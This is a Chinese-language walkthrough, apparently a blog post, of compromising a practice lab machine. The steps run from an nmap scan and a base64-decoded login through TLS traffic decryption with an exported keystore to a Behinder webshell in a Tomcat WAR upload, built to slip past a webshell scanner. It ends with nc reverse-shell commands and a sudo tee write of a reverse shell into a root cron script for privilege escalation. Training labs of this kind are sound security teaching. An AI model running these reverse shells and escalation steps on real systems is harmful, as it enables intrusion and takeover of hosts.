0x01 外网艰难打点
首先使用另外一张网卡,将机器NAT连接
nmap -sV 192.168.110.140
Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
这个字符为base64,我们进行解密
用刚刚破解出来的密码尝试登陆,pgibbons是账号,damnitfeel$goodtobeagang$ta是密码
进到了一个邮件系统,让我们查看一下收件箱,进行基本的信息收集。
第1封邮件,主要内容:让你的团队只能向管理门户发布任何敏感的内容。我的密码非常安全,发自ImpressCMS Admin Bill
第2封邮件,主要内容:Michael采购了IDS/IPS。
第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore
192.168.110.140/.keystore
链接
访问把他下载下来
a.这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个keystore,这里提供了密码,是解密SSL密钥)
b.系统中可能存在tomcat。
把两个文件,放到一个文件夹里面,使用keytool工具解密,从秘钥库导出.p12 证书
keytool -list -keystore keystore
keytool -importkeystore -srckeystore keystore -destkeystore admin.p12 -deststoretype pkcs12
点开Protocols,寻找TLS 或者SSL,填写靶场IP地址、端口、协议、Key文件路径、密码
0x02 流量包泄露到Linux提权
登录后台时需要处理一下,设置代理为本地代理,才能访问,而且必须要HTTPS
因为是tomcat,我们这里把shell添加成ZIP后缀的压缩包,然后直接重命名修改为war后缀的文件,再进行上传(这里因为靶机存在查杀Webshell的工具,每隔一段时间shell就被删除了)然后我们使用冰蝎马,因为是加密传输所以并没有被杀掉
nc -l -p 4444
冰蝎执行反弹命令
nc -nv 192.168.1.1 -c /bin/bashl -p 4444
接收到弹回来的shell之后我们使用Python写一个交互式的shell
Python -c ‘import pty;pty.spawn(“/bin/bash”)’
连接数据库,在数据库中找到机器ssh的用户的密码
echo"nc 192.168.1.1 4444 -e /bin/bash" >> shell.txt
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
然后Kali进行监听,因为该脚本为定时执行,我们只需要等待shell弹回来即可
欢迎 点赞丨留言丨分享至朋友圈 三连
好文推荐